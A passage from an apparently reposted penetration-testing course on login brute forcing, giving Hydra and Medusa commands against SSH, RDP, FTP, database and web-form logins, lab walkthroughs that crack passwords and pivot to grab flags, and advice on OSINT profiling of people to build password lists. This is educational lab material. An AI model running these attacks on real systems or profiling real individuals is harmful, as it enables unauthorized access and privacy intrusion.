                           which allow
                            users to
                          access
                                   their email
                              remotely.

mysql   MySQL Database  Attempts to   hydra -l root -P /path/to/password_list
                               brute-force    mysql://192.168.1.100
                                login
                               credentials
                                   for MySQL
                            databases.

mssql    Microsoft SQL      Targets       hydra -l sa -P /path/to/password_list.t
         Server             Microsoft     mssql://192.168.1.100
                    SQL
                             servers to
                               brute-force
                          database
                                login
                                credentials.
      https://t.me/offenciveSec
 Hydra    Service/Protocol  Description  Example Command
 Service

 vnc        Virtual Network     Brute-        hydra -P /path/to/password_list.txt
          Computing (VNC)  forces VNC   vnc://192.168.1.100
                                services,
                          used for
                           remote
                            desktop
                             access.

 rdp     Remote Desktop   Targets       hydra -l admin -P /path/to/password_lis
           Protocol (RDP)     Microsoft     rdp://192.168.1.100
                    RDP
                               services for
                           remote
                                 login brute-
                                  forcing.


Brute-Forcing HTTP Authentication

Imagine you're tasked with testing the security of a website using basic HTTP authentication
at www.example.com . You have a list of potential usernames stored in usernames.txt and
corresponding passwords in passwords.txt . To launch a brute-force attack against this
HTTP service, use the following Hydra command:


  hydra -L usernames.txt -P passwords.txt www.example.com http-get



This command instructs Hydra to:

    Use the list of usernames from the usernames.txt  file.
    Use the list of passwords from the passwords.txt  file.
     Target the website www.example.com .
    Employ the http-get module to test the HTTP authentication.

Hydra will systematically try each username-password combination against the target
website to discover a valid login.

Targeting Multiple SSH Servers

Consider a situation where you have identified several servers that may be vulnerable to
SSH brute-force attacks. You compile their IP addresses into a file named targets.txt and
know that these servers might use the default username "root" and password "toor." To
efficiently test all these servers simultaneously, use the following Hydra command:

      https://t.me/offenciveSec
  hydra -l root -p toor -M targets.txt ssh



This command instructs Hydra to:

    Use the username "root".

    Use the password "toor".
     Target all IP addresses listed in the targets.txt  file.
    Employ the ssh module for the attack.

Hydra will execute parallel brute-force attempts on each server, significantly speeding up the
process.

Testing FTP Credentials on a Non-Standard Port

Imagine you need to assess the security of an FTP server hosted at ftp.example.com ,
which operates on a non-standard port 2121 . You have lists of potential usernames and
passwords stored in usernames.txt and passwords.txt , respectively. To test these
credentials against the FTP service, use the following Hydra command:


  hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftp



This command instructs Hydra to:

    Use the list of usernames from the usernames.txt  file.
    Use the list of passwords from the passwords.txt  file.
     Target the FTP service on ftp.example.com via port 2121 .
    Use the ftp module and provide verbose output ( -V ) for detailed monitoring.

Hydra will attempt to match each username-password combination against the FTP server
on the specified port.

Brute-Forcing a Web Login Form

Suppose you are tasked with brute-forcing a login form on a web application at
www.example.com . You know the username is "admin," and the form parameters for the
login are user=^USER^&pass=^PASS^ . To perform this attack, use the following Hydra
command:


  hydra -l admin -P passwords.txt www.example.com http-post-form
  "/login:user=^USER^&pass=^PASS^:S=302"

      https://t.me/offenciveSec
This command instructs Hydra to:

    Use the username "admin".

    Use the list of passwords from the passwords.txt  file.
     Target the login form at /login on www.example.com .
    Employ the http-post-form module with the specified form parameters.
    Look for a successful login indicated by the HTTP status code 302 .

Hydra will systematically attempt each password for the "admin" account, checking for the
specified success condition.

Advanced RDP Brute-Forcing

Now, imagine you're testing a Remote Desktop Protocol (RDP) service on a server with IP
192.168.1.100 . You suspect the username is "administrator," and that the password
consists of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers. To
carry out this precise attack, use the following Hydra command:


  hydra -l administrator -x
  6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
  192.168.1.100 rdp



This command instructs Hydra to:

    Use the username "administrator".
    Generate and test passwords ranging from 6 to 8 characters, using the specified
     character set.
     Target the RDP service on 192.168.1.100 .
    Employ the rdp module for the attack.

Hydra will generate and test all possible password combinations within the specified
parameters, attempting to break into the RDP service.

Basic HTTP Authentication

Web applications often employ authentication mechanisms to protect sensitive data and
functionalities. Basic HTTP Authentication, or simply Basic Auth , is a rudimentary yet
common method for securing resources on the web. Though easy to implement, its inherent
security vulnerabilities make it a frequent target for brute-force attacks.

In essence, Basic Auth is a challenge-response protocol where a web server demands user
credentials before granting access to protected resources. The process begins when a user
attempts to access a restricted area. The server responds with a 401 Unauthorized status
and a WWW-Authenticate header prompting the user's browser to present a login dialog.
      https://t.me/offenciveSec
Once the user provides their username and password, the browser concatenates them into a
single string, separated by a colon. This string is then encoded using Base64 and included in
the Authorization header of subsequent requests, following the format Basic
<encoded_credentials> . The server decodes the credentials, verifies them against its
database, and grants or denies access accordingly.

For example, the headers for Basic Auth in a HTTP GET request would look like:


  GET /protected_resource HTTP/1.1
  Host: www.example.com
  Authorization: Basic YWxpY2U6c2VjcmV0MTIz


Exploiting Basic Auth with Hydra

To follow along, start the target system via the question section at the bottom of the
page.

We will use the http-get hydra service to brute force the basic authentication target.

In this scenario, the spawned target instance employs Basic HTTP Authentication. We
already know the username is basic-auth-user . Since we know the username, we can
simplify the Hydra command and focus solely on brute-forcing the password. Here's the
command we'll use:


  # Download wordlist if needed
  curl -s -O
  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords
  /2023-200_most_used_passwords.txt
  # Hydra command
  hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1
  http-get / -s 81


  ...
  Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use
  in military or secret service organizations, or for illegal purposes (this
  is non-binding, these *** ignore laws and ethics anyway).


  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-09
  16:04:31
  [DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries
  (l:1/p:200), ~13 tries per task
  [DATA] attacking http-get://127.0.0.1:81/
  [81][http-get] host: 127.0.0.1   login: basic-auth-user   password: ...
  1 of 1 target successfully completed, 1 valid password found
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-09
      https://t.me/offenciveSec
  16:04:32



Let's break down the command:

     -l basic-auth-user : This specifies that the username for the login attempt is 'basic-
     auth-user'.

     -P 2023-200_most_used_passwords.txt : This indicates that Hydra should use the
    password list contained in the file '2023-200_most_used_passwords.txt' for its brute-
     force attack.
     127.0.0.1 : This is the target IP address, in this case, the local machine (localhost).
     http-get / : This tells Hydra that the target service is an HTTP server and the attack
     should be performed using HTTP GET requests to the root path ('/').

     -s 81 : This overrides the default port for the HTTP service and sets it to 81.

Upon execution, Hydra will systematically attempt each password from the 2023-
200_most_used_passwords.txt  file against the specified resource. Eventually it will return
the correct password for basic-auth-user , which you can use to login to the website and
retrieve the flag.

Login Forms

Beyond the realm of Basic HTTP Authentication, many web applications employ custom
login forms as their primary authentication mechanism. These forms, while visually diverse,
often share common underlying mechanics that make them targets for brute forcing.

Understanding Login Forms

While login forms may appear as simple boxes soliciting your username and password, they
represent a complex interplay of client-side and server-side technologies. At their core, login
forms are essentially HTML forms embedded within a webpage. These forms typically
include input fields ( <input> ) for capturing the username and password, along with a
submit button ( <button> or <input type="submit"> ) to initiate the authentication
process.

A Basic Login Form Example

Most login forms follow a similar structure. Here's an example:


  <form action="/login" method="post">
    <label for="username">Username:</label>
    <input type="text" id="username" name="username"><br><br>
    <label for="password">Password:</label>
    <input type="password" id="password" name="password"><br><br>
    <input type="submit" value="Submit">
      https://t.me/offenciveSec
  </form>



This form, when submitted, sends a POST request to the /login endpoint on the server,
including the entered username and password as form data.


  POST /login HTTP/1.1
  Host: www.example.com
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 29


  username=john&password=secret123



    The POST method indicates that data is being sent to the server to create or update a
     resource.

     /login is the URL endpoint handling the login request.
    The Content-Type header specifies how the data is encoded in the request body.
    The Content-Length header indicates the size of the data being sent.
    The request body contains the username and password, encoded as key-value pairs.

When a user interacts with a login form, their browser handles the initial processing. The
browser captures the entered credentials, often employing JavaScript for client-side
validation or input sanitization. Upon submission, the browser constructs an HTTP POST
request. This request encapsulates the form data—including the username and password—
within its body, often encoded as application/x-www-form-urlencoded or
multipart/form-data .

http-post-form

To follow along, start the target system via the question section at the bottom of the
page.

Hydra's http-post-form service is specifically designed to target login forms. It enables the
automation of POST requests, dynamically inserting username and password combinations
into the request body. By leveraging Hydra's capabilities, attackers can efficiently test
numerous credential combinations against a login form, potentially uncovering valid logins.

The general structure of a Hydra command using http-post-form looks like this:


  hydra [options] target http-post-form "path:params:condition_string"


Understanding the Condition String
      https://t.me/offenciveSec
In Hydra’s http-post-form module, success and failure conditions are crucial for properly
identifying valid and invalid login attempts. Hydra primarily relies on failure conditions (
F=... ) to determine when a login attempt has failed, but you can also specify a success
condition ( S=... ) to indicate when a login is successful.

The failure condition ( F=... ) is used to check for a specific string in the server's response
that signals a failed login attempt. This is the most common approach because many
websites return an error message (like "Invalid username or password") when the login fails.
For example, if a login form returns the message "Invalid credentials" on a failed attempt,
you can configure Hydra like this:


  hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid
  credentials"



In this case, Hydra will check each response for the string "Invalid credentials." If it finds this
phrase, it will mark the login attempt as a failure and move on to the next
username/password pair. This approach is commonly used because failure messages are
usually easy to identify.

However, sometimes you may not have a clear failure message but instead have a distinct
success condition. For instance, if the application redirects the user after a successful login
(using HTTP status code 302 ), or displays specific content (like "Dashboard" or "Welcome"),
you can configure Hydra to look for that success condition using S= . Here’s an example
where a successful login results in a 302 redirect:


  hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302"



In this case, Hydra will treat any response that returns an HTTP 302 status code as a
successful login. Similarly, if a successful login results in content like "Dashboard" appearing
on the page, you can configure Hydra to look for that keyword as a success condition:


  hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard"



Hydra will now register the login as successful if it finds the word "Dashboard" in the server’s
response.

Before unleashing Hydra on a login form, it's essential to gather intelligence on its inner
workings. This involves pinpointing the exact parameters the form uses to transmit the
username and password to the server.

Manual Inspection
      https://t.me/offenciveSec
Upon accessing the IP:PORT in your browser, a basic login form is presented. Using your
browser's developer tools (typically by right-clicking and selecting "Inspect" or a similar
option), you can view the underlying HTML code for this form. Let's break down its key
components:


  <form method="POST">
      <h2>Login</h2>
      <label for="username">Username:</label>
      <input type="text" id="username" name="username">
      <label for="password">Password:</label>
      <input type="password" id="password" name="password">
      <input type="submit" value="Login">
  </form>



The HTML reveals a simple login form. Key points for Hydra:

     Method : POST - Hydra will need to send POST requests to the server.
     Fields:
         Username : The input field named username will be targeted.
         Password : The input field named password will be targeted.

With these details, you can construct the Hydra command to automate the brute-force attack
against this login form.

Browser Developer Tools

After inspecting the form, open your browser's Developer Tools (F12) and navigate to the
"Network" tab. Submit a sample login attempt with any credentials. This will allow you to see
the POST request sent to the server. In the "Network" tab, find the request corresponding to
the form submission and check the form data, headers, and the server’s response.





      https://t.me/offenciveSec
This information further solidifies the information we will need for Hydra. We now have
definitive confirmation of both the target path ( / ) and the parameter names ( username
and password ).

Proxy Interception

For more complex scenarios, intercepting the network traffic with a proxy tool like Burp Suite
or OWASP ZAP can be invaluable. Configure your browser to route its traffic through the
proxy, then interact with the login form. The proxy will capture the POST request, allowing
you to dissect its every component, including the precise login parameters and their values.

Constructing the params String for Hydra

After analyzing the login form's structure and behavior, it's time to build the params string, a
critical component of Hydra's http-post-form attack module. This string encapsulates the
data that will be sent to the server with each login attempt, mimicking a legitimate form
submission.

The params string consists of key-value pairs, similar to how data is encoded in a POST
request. Each pair represents a field in the login form, with its corresponding value.

     Form Parameters : These are the essential fields that hold the username and
    password. Hydra will dynamically replace placeholders ( ^USER^ and ^PASS^ ) within
     these parameters with values from your wordlists.
     Additional Fields : If the form includes other hidden fields or tokens (e.g., CSRF
     tokens), they must also be included in the params string. These can have static values
     or dynamic placeholders if their values change with each request.
     Success Condition : This defines the criteria Hydra will use to identify a successful
      login. It can be an HTTP status code (like S=302 for a redirect) or the presence or
    absence of specific text in the server's response (e.g., F=Invalid credentials or
     S=Welcome ).

Let's apply this to our scenario. We've discovered:

    The form submits data to the root path ( / ).
    The username field is named username .
    The password field is named password .
    An error message "Invalid credentials" is displayed upon failed login.

Therefore, our params string would be:


  /:username=^USER^&password=^PASS^:F=Invalid credentials



     "/" : The path where the form is submitted.
      https://t.me/offenciveSec
     username=^USER^&password=^PASS^ : The form parameters with placeholders for
     Hydra.

     F=Invalid credentials : The failure condition – Hydra will consider a login attempt
     unsuccessful if it sees this string in the response.

We will be using top-usernames-shortlist.txt for the username list, and 2023-
200_most_used_passwords.txt for the password list.

This params string is incorporated into the Hydra command as follows. Hydra will
systematically substitute ^USER^ and ^PASS^ with values from your wordlists, sending
POST requests to the target and analyzing the responses for the specified failure condition.
If a login attempt doesn't trigger the "Invalid credentials" message, Hydra will flag it as a
potential success, revealing the valid credentials.


  # Download wordlists if needed
  curl -s -O
  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames
  /top-usernames-shortlist.txt
  curl -s -O
  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords
  /2023-200_most_used_passwords.txt
  # Hydra command
  hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -
  f IP -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid
  credentials"


  Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use
  in military or secret service organizations, or for illegal purposes (this
  is non-binding, these *** ignore laws and ethics anyway).


  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-05
  12:51:14
  [DATA] max 16 tasks per 1 server, overall 16 tasks, 3400 login tries
  (l:17/p:200), ~213 tries per task
  [DATA] attacking http-post-
  form://IP:PORT/:username=^USER^&password=^PASS^:F=Invalid credentials
  [5000][http-post-form] host: IP   login: ...   password: ...
  [STATUS] attack finished for IP (valid pair found)
  1 of 1 target successfully completed, 1 valid password found
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-05
  12:51:28



Remember that crafting the correct params string is crucial for a successful Hydra attack.
Accurate information about the form's structure and behavior is essential for constructing this
string effectively. Once Hydra has completed the attack, log into the website using the found
credentials, and retrieve the flag.
      https://t.me/offenciveSec
Medusa




Medusa, a prominent tool in the cybersecurity arsenal, is designed to be a fast, massively
parallel, and modular login brute-forcer. Its primary objective is to support a wide array of
services that allow remote authentication, enabling penetration testers and security
professionals to assess the resilience of login systems against brute-force attacks.

Installation

Medusa often comes pre-installed on popular penetration testing distributions. You can verify
its presence by running:


  medusa -h



Installing Medusa on a Linux system is straightforward.


  sudo apt-get -y update
  sudo apt-get -y install medusa


Command Syntax and Parameter Table

Medusa's command-line interface is straightforward. It allows users to specify hosts, users,
passwords, and modules with various options to fine-tune the attack process.


   medusa [target_options] [credential_options] -M module [module_options]





      https://t.me/offenciveSec
Parameter         Explanation  Usage Example

-h HOST or -H      Target        medusa -h 192.168.1.10 ... or medusa -H
FILE                options:       targets.txt ...
                    Specify
                       either a
                      single
                      target
                 hostname
                     or IP
                   address ( -
                  h ) or a file
                     containing
                 a list of
                      targets ( -
                  H ).

-u USERNAME or   Username    medusa -u admin ... or medusa -U usernames.txt
-U FILE             options:
                   Provide
                       either a
                      single
                 username (
                  -u ) or a file
                     containing
                 a list of
                 usernames
                            ( -U ).

-p PASSWORD or    Password     medusa -p password123 ... or medusa -P
-P FILE             options:       passwords.txt ...
                    Specify
                       either a
                      single
                  password (
                  -p ) or a file
                     containing
                 a list of
                  passwords (
                  -P ).

-M MODULE         Module:      medusa -M ssh ...
                    Define the
                       specific
                 module to
                 use for the
                     attack (e.g.,
                  ssh , ftp ,
                  http ).

      https://t.me/offenciveSec
Parameter         Explanation  Usage Example

-m               Module       medusa -M http -m "POST /login.php
"MODULE_OPTION"   options:       HTTP/1.1\r\nContent-Length: 30\r\nContent-Type
                   Provide       application/x-www-form-
                      additional     urlencoded\r\n\r\nusername=^USER^&password=^PA
                   parameters    ...
                     required by
                    the chosen
                   module,
                   enclosed in
                    quotes.

-t TASKS           Tasks:        medusa -t 4 ...
                    Define the
                 number of
                       parallel
                      login
                    attempts to
                      run,
                       potentially
                   speeding
                 up the
                      attack.

-f or -F           Fast mode:    medusa -f ... or medusa -F ...
                  Stop the
                     attack after
                    the first
                    successful
                      login is
                    found,
                       either on
                    the current
                    host ( -f )
                     or any host
                            ( -F ).

-n PORT             Port:         medusa -n 2222 ...
                    Specify a
                     non-default
                      port for the
                      target
                      service.



      https://t.me/offenciveSec
 Parameter         Explanation  Usage Example

 -v LEVEL         Verbose      medusa -v 4 ...
                       output:
                     Display
                       detailed
                      information
                    about the
                        attack's
                      progress.
                 The higher
                      the LEVEL
                     (up to 6),
                      the more
                    verbose the
                       output.


Medusa Modules

Each module in Medusa is tailored to interact with specific authentication mechanisms,
allowing it to send the appropriate requests and interpret responses for successful attacks.
Below is a table of commonly used modules:


 Medusa     Service/Protocol  Description   Usage Example
 Module

 FTP           File Transfer       Brute-         medusa -M ftp -h 192.168.1.100 -u
               Protocol            forcing FTP    passwords.txt
                                      login
                                     credentials,
                             used for file
                                     transfers
                                 over a
                                  network.

 HTTP        Hypertext          Brute-         medusa -M http -h www.example.com
               Transfer Protocol   forcing login    P passwords.txt -m DIR:/login.php
                                forms on      FORM:username=^USER^&password=^PAS
                          web
                                    applications
                                 over HTTP
                             (GET/POST).

 IMAP         Internet            Brute-         medusa -M imap -h mail.example.com
            Message Access   forcing IMAP   -P passwords.txt
               Protocol             logins, often
                             used to
                               access
                                 email
      https://t.me/offenciveSecservers.
Medusa     Service/Protocol  Description   Usage Example
Module

MySQL     MySQL Database  Brute-         medusa -M mysql -h 192.168.1.100 -
                                    forcing        passwords.txt
                       MySQL
                              database
                                    credentials,
                           commonly
                            used for
                         web
                                   applications
                            and
                               databases.

POP3       Post Office         Brute-         medusa -M pop3 -h mail.example.com
              Protocol 3          forcing        -P passwords.txt
                       POP3
                                     logins,
                                       typically
                            used to
                                     retrieve
                                emails from
                            a mail server.

RDP       Remote Desktop   Brute-         medusa -M rdp -h 192.168.1.100 -u
              Protocol            forcing RDP    passwords.txt
                                     logins,
                           commonly
                            used for
                             remote
                               desktop
                             access to
                          Windows
                               systems.

SSHv2      Secure Shell       Brute-         medusa -M ssh -h 192.168.1.100 -u
            (SSH)               forcing SSH    passwords.txt
                                     logins,
                           commonly
                            used for
                               secure
                             remote
                                access.

Subversion   Version Control     Brute-         medusa -M svn -h 192.168.1.100 -u
(SVN)       System             forcing        passwords.txt
                               Subversion
                            (SVN)
                                    repositories
                                       for version
                                     control.
      https://t.me/offenciveSec
 Medusa     Service/Protocol  Description   Usage Example
 Module

 Telnet        Telnet Protocol     Brute-         medusa -M telnet -h 192.168.1.100
                                     forcing        passwords.txt
                                    Telnet
                                   services for
                               remote
                         command
                                 execution on
                                    older
                                systems.

 VNC           Virtual Network     Brute-         medusa -M vnc -h 192.168.1.100 -P
             Computing          forcing VNC
                                      login
                                    credentials
                                         for remote
                                desktop
                                 access.

 Web Form    Brute-forcing       Brute-         medusa -M web-form -h www.example.
          Web Login Forms   forcing login    users.txt -P passwords.txt -m
                                forms on      FORM:"username=^USER^&password=^PA
                                 websites
                                 using HTTP
                       POST
                                   requests.


Targeting an SSH Server

Imagine a scenario where you need to test the security of an SSH server at
192.168.0.100 . You have a list of potential usernames in usernames.txt and common
passwords in passwords.txt . To launch a brute-force attack against the SSH service on
this server, use the following Medusa command:


  medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh



This command instructs Medusa to:

     Target the host at 192.168.0.100 .
    Use the usernames from the usernames.txt  file.
     Test the passwords listed in the passwords.txt  file.
    Employ the ssh module for the attack.

Medusa will systematically try each username-password combination against the SSH
service to attempt to gain unauthorized access.
      https://t.me/offenciveSec
Targeting Multiple Web Servers with Basic HTTP
Authentication

Suppose you have a list of web servers that use basic HTTP authentication. These servers'
addresses are stored in web_servers.txt , and you also have lists of common usernames
and passwords in usernames.txt and passwords.txt , respectively. To test these servers
concurrently, execute:


  medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET



In this case, Medusa will:

      Iterate through the list of web servers in web_servers.txt .
    Use the usernames and passwords provided.
    Employ the http module with the GET method to attempt logins.

By running multiple threads, Medusa efficiently checks each server for weak credentials.

Testing for Empty or Default Passwords

If you want to assess whether any accounts on a specific host ( 10.0.0.5 ) have empty or
default passwords (where the password matches the username), you can use:


  medusa -h 10.0.0.5 -U usernames.txt -e ns -M service_name



This command instructs Medusa to:

     Target the host at 10.0.0.5 .
    Use the usernames from usernames.txt .
    Perform additional checks for empty passwords ( -e n ) and passwords matching the
    username ( -e s ).
    Use the appropriate service module (replace service_name with the correct module
    name).

Medusa will try each username with an empty password and then with the password
matching the username, potentially revealing accounts with weak or default configurations.

Web Services


      https://t.me/offenciveSec
In the dynamic landscape of cybersecurity, maintaining robust authentication mechanisms is
paramount. While technologies like Secure Shell ( SSH ) and File Transfer Protocol ( FTP )
facilitate secure remote access and file management, they are often reliant on traditional
username-password combinations, presenting potential vulnerabilities exploitable through
brute-force attacks. In this module, we will delve into the practical application of Medusa , a
potent brute-forcing tool, to systematically compromise both SSH and FTP services, thereby
illustrating potential attack vectors and emphasizing the importance of fortified authentication
practices.

SSH is a cryptographic network protocol that provides a secure channel for remote login,
command execution, and file transfers over an unsecured network. Its strength lies in its
encryption, which makes it significantly more secure than unencrypted protocols like
Telnet . However, weak or easily guessable passwords can undermine SSH's security,
exposing it to brute-force attacks.

FTP is a standard network protocol for transferring files between a client and a server on a
computer network. It's also widely used for uploading and downloading files from websites.
However, standard FTP transmits data, including login credentials, in cleartext, rendering it
susceptible to interception and brute-forcing.

Kick-off

To follow along, start the target system via the question section at the bottom of the
page.

We begin our exploration by targeting an SSH server running on a remote system. Assuming
prior knowledge of the username sshuser , we can leverage Medusa to attempt different
password combinations until successful authentication is achieved systematically.

The following command serves as our starting point:


  medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M
  ssh -t 3



Let's break down each component:

     -h <IP> : Specifies the target system's IP address.
     -n <PORT> : Defines the port on which the SSH service is listening (typically port 22).
     -u sshuser : Sets the username for the brute-force attack.
     -P 2023-200_most_used_passwords.txt : Points Medusa to a wordlist containing the
    200 most commonly used passwords in 2023. The effectiveness of a brute-force attack
      is often tied to the quality and relevance of the wordlist used.
     -M ssh : Selects the SSH module within Medusa, tailoring the attack specifically for
   SSH authentication.
      https://t.me/offenciveSec
     -t 3 : Dictates the number of parallel login attempts to execute concurrently.
     Increasing this number can speed up the attack but may also increase the likelihood of
     detection or triggering security measures on the target system.


  medusa -h IP -n PORT -u sshuser -P 2023-200_most_used_passwords.txt -M ssh
  -t 3


  Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email
  protected]>
  ...
  ACCOUNT FOUND: [ssh] Host: IP User: sshuser Password: 1q2w3e4r5t [SUCCESS]



Upon execution, Medusa will display its progress as it cycles through the password
combinations. The output will indicate a successful login, revealing the correct password.

Gaining Access

With the password in hand, establish an SSH connection using the following command and
enter the found password when prompted:


  ssh sshuser@<IP> -p PORT



This command will initiate an interactive SSH session, granting you access to the remote
system's command line.

Expanding the Attack Surface

Once inside the system, the next step is identifying other potential attack surfaces. Using
netstat (within the SSH session) to list open ports and listening services, you discover a
service running on port 21.


  netstat -tulpn | grep LISTEN


  tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
  -
  tcp6       0      0 :::22                   :::*                    LISTEN
  -
  tcp6       0      0 :::21                   :::*                    LISTEN
  -



Further reconnaissance with nmap (within the SSH session) confirms this finding as an ftp
server.
      https://t.me/offenciveSec
  nmap localhost


  Starting Nmap 7.80 ( https://nmap.org ) at 2024-09-05 13:19 UTC
  Nmap scan report for localhost (127.0.0.1)
  Host is up (0.000078s latency).
  Other addresses for localhost (not scanned): ::1
  Not shown: 998 closed ports
  PORT   STATE SERVICE
  21/tcp open  ftp
  22/tcp open  ssh


  Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds


Targeting the FTP Server

Having identified the FTP server, you can proceed to brute-force its authentication
mechanism.

If we explore the /home directory on the target system, we see an ftpuser folder, which
implies the likelihood of the FTP sever username being ftpuser . Based on this, we can
modify our Medusa command accordingly:


  medusa -h 127.0.0.1 -u ftpuser -P 2020-200_most_used_passwords.txt -M ftp
  -t 5


  Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email
  protected]>


  GENERAL: Parallel Hosts: 1 Parallel Logins: 5
  GENERAL: Total Hosts: 1
  GENERAL: Total Users: 1
  GENERAL: Total Passwords: 197
  ...
  ACCOUNT FOUND: [ftp] Host: 127.0.0.1 User: ... Password: ... [SUCCESS]
  ...
  GENERAL: Medusa has finished.



The key differences here are:

     -h 127.0.0.1 : Targets the local system, as the FTP server is running locally. Using
     the IP address tells medusa explicitly to use IPv4.
     -u ftpuser : Specifies the username ftpuser .
     -M ftp : Selects the FTP module within Medusa.
     -t 5 : Increases the number of parallel login attempts to 5.
      https://t.me/offenciveSec
Retrieving The Flag

Upon successfully cracking the FTP password, establish an FTP connection. Within the FTP
session, use the get command to download the flag.txt  file, which may contain sensitive
information.:


  ftp ftp://ftpuser:<FTPUSER_PASSWORD>@localhost


  Trying [::1]:21 ...
  Connected to localhost.
  220 (vsFTPd 3.0.5)
  331 Please specify the password.
  230 Login successful.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  200 Switching to Binary mode.
  ftp> ls
  229 Entering Extended Passive Mode (|||25926|)
  150 Here comes the directory listing.
  -rw-------    1 1001     1001           35 Sep 05 13:17 flag.txt
  226 Directory send OK.
  ftp> get flag.txt
  local: flag.txt remote: flag.txt
  229 Entering Extended Passive Mode (|||37251|)
  150 Opening BINARY mode data connection for flag.txt (35 bytes).
  100%
  |*************************************************************************
  **|    35      776.81 KiB/s    00:00 ETA
  226 Transfer complete.
  35 bytes received in 00:00 (131.45 KiB/s)
  ftp> exit
  221 Goodbye.



Then read the file to get the flag:


  cat flag.txt
  HTB{...}



The ease with which such attacks can be executed underscores the importance of
employing strong, unique passwords.

Custom Wordlists

      https://t.me/offenciveSec
While pre-made wordlists like rockyou or SecLists provide an extensive repository of
potential passwords and usernames, they operate on a broad spectrum, casting a wide net
in the hopes of catching the right combination. While effective in some scenarios, this
approach can be inefficient and time-consuming, especially when targeting specific
individuals or organizations with unique password or username patterns.

Consider the scenario where a pentester attempts to compromise the account of "Thomas
Edison" at his workplace. A generic username list like xato-net-10-million-usernames-
dup.txt is unlikely to yield any meaningful results. Given the potential username
conventions enforced by his company, the probability of his specific username being
included in such a massive dataset is minimal. These could range from a straightforward first
name/last name format to more intricate combinations like last name/first three.

In such cases, the power of custom wordlists comes into play. These meticulously crafted
lists, tailored to the specific target and their environment, dramatically increase brute-force
attacks' efficiency and success rate. They leverage information gathered from various
sources, such as social media profiles, company directories, or even leaked data, to create a
focused and highly relevant set of potential passwords and usernames. This laser-sharp
approach minimizes wasted effort and maximizes the chances of cracking the target
account.

Username Anarchy

Even when dealing with a seemingly simple name like "Jane Smith," manual username
generation can quickly become a convoluted endeavor. While the obvious combinations like
jane , smith , janesmith , j.smith , or jane.s may seem adequate, they barely scratch
the surface of the potential username landscape.

Human creativity knows no bounds, and usernames often become a canvas for personal
expression. Jane could seamlessly weave in her middle name, birth year, or a cherished
hobby, leading to variations like janemarie , smithj87 , or jane_the_gardener . The allure
of leetspeak , where letters are replaced with numbers or symbols, could manifest in
usernames like j4n3 , 5m1th , or j@n3_5m1th . Her passion for a particular book, movie, or
band might inspire usernames like winteriscoming , potterheadjane , or
smith_beatles_fan .

This is where Username Anarchy shines. It accounts for initials, common substitutions, and
more, casting a wider net in your quest to uncover the target's username:


  ./username-anarchy -l


  Plugin name             Example
  --------------------------------------------------------------------------
  ------
  first                   anna
  firstlast https://t.me/offenciveSecannakey
  first.last              anna.key
  firstlast[8]            annakey
  first[4]last[4]         annakey
  firstl                  annak
  f.last                  a.key
  flast                   akey
  lfirst                  kanna
  l.first                 k.anna
  lastf                   keya
  last                    key
  last.f                  key.a
  last.first              key.anna
  FLast                   AKey
  first1                  anna0,anna1,anna2
  fl                      ak
  fmlast                  abkey
  firstmiddlelast         annaboomkey
  fml                     abk
  FL                      AK
  FirstLast               AnnaKey
  First.Last              Anna.Key
  Last                    Key



First, install ruby, and then pull the Username Anarchy git to get the script:


  sudo apt install ruby -y
  git clone https://github.com/urbanadventurer/username-anarchy.git
  cd username-anarchy



Next, execute it with the target's first and last names. This will generate possible username
combinations.


  ./username-anarchy Jane Smith > jane_smith_usernames.txt



Upon inspecting jane_smith_usernames.txt , you'll encounter a diverse array of
usernames, encompassing:

     Basic combinations: janesmith , smithjane , jane.smith , j.smith , etc.
       Initials: js , j.s. , s.j. , etc.
     etc

This comprehensive list, tailored to the target's name, is valuable in a brute-force attack.
      https://t.me/offenciveSec
CUPP

With the username aspect addressed, the next formidable hurdle in a brute-force attack is
the password. This is where CUPP (Common User Passwords Profiler) steps in, a tool
designed to create highly personalized password wordlists that leverage the gathered
intelligence about your target.

Let's continue our exploration with Jane Smith. We've already employed Username Anarchy
to generate a list of potential usernames. Now, let's use CUPP to complement this with a
targeted password list.

The efficacy of CUPP hinges on the quality and depth of the information you feed it. It's akin
to a detective piecing together a suspect's profile - the more clues you have, the clearer the
picture becomes. So, where can one gather this valuable intelligence for a target like Jane
Smith?

     Social Media : A goldmine of personal details: birthdays, pet names, favorite quotes,
      travel destinations, significant others, and more. Platforms like Facebook, Twitter,
     Instagram, and LinkedIn can reveal much information.
     Company Websites : Jane's current or past employers' websites might list her name,
     position, and even her professional bio, offering insights into her work life.

     Public Records : Depending on jurisdiction and privacy laws, public records might
     divulge details about Jane's address, family members, property ownership, or even
     past legal entanglements.
     News Articles and Blogs : Has Jane been featured in any news articles or blog
     posts? These could shed light on her interests, achievements, or affiliations.

OSINT will be a goldmine of information for CUPP. Provide as much information as possible;
